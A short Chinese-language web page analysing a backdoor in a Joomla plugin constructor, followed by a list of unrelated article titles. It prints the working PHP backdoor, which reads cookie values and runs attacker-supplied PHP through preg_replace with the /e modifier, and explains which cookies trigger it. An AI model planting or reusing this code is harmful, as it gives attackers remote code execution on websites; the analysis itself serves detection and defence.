Joomla插件构造函数后门分析
来源:互联网 发布:鲁大师是什么软件 编辑:程序博客网 时间:2024/06/06 04:22
public function __construct() {$filter = JRequest::getString('p3', Null, 'cookie');if ($filter) {$option = $filter(JRequest::getString('p2', Null, 'cookie'));$auth = $filter(JRequest::getString('p1', Null, 'cookie'));$option("/123/e",$auth,123);die();}}
preg_replace("/123/e", $auth, 123);
p3 - 该变量触发后门执行,如果没有该变量,Joomla会正常执行。p2 - 该变量的值应该设置为“preg_replace”、p1 - 任意PHP功能代码
整个插件都是恶意代码吗
To 站长:
0 0
- Joomla插件构造函数后门分析
- Joomla插件
- 使用php代码加亮函数构造php小后门
- 使用php代码加亮函数构造php小后门
- 使用php代码加亮函数构造php小后门
- 构造函数实例分析
- javaScript构造函数分析
- Joomla!的插件系统
- joomla常用插件
- joomla下面插件开发
- joomla插件管理
- Joomla插件开发规范
- Joomla 插件库
- joomla网页加速插件
- joomla!的kindeditor插件
- ACKcmd后门分析
- ACKcmd后门分析
- php一句话后门分析
- C# B/S 使用域用户验证
- ActionBarSherlock与Fragment及ViewPager结合实现滑动切换页面
- UNDO相关问题总结(六)
- 项目PMO工作
- iframe获取父、子窗口的方法
- Joomla插件构造函数后门分析
- JavaBean中使用JDBC方式进行事务处理
- js 获取网页高度等信息
- eclipse中启动Tomcat7 server失败Caused by: java.lang.IllegalArgumentException: The servlets named...
- 怎样发高质量的外链
- hibernate事务并发机制
- box2d -ApplyForce, ApplyImpulse, SetLinearVelocity
- diacuzX】门户diy风格模版制作教程。
- Android项目中的编译问题及appcompatv7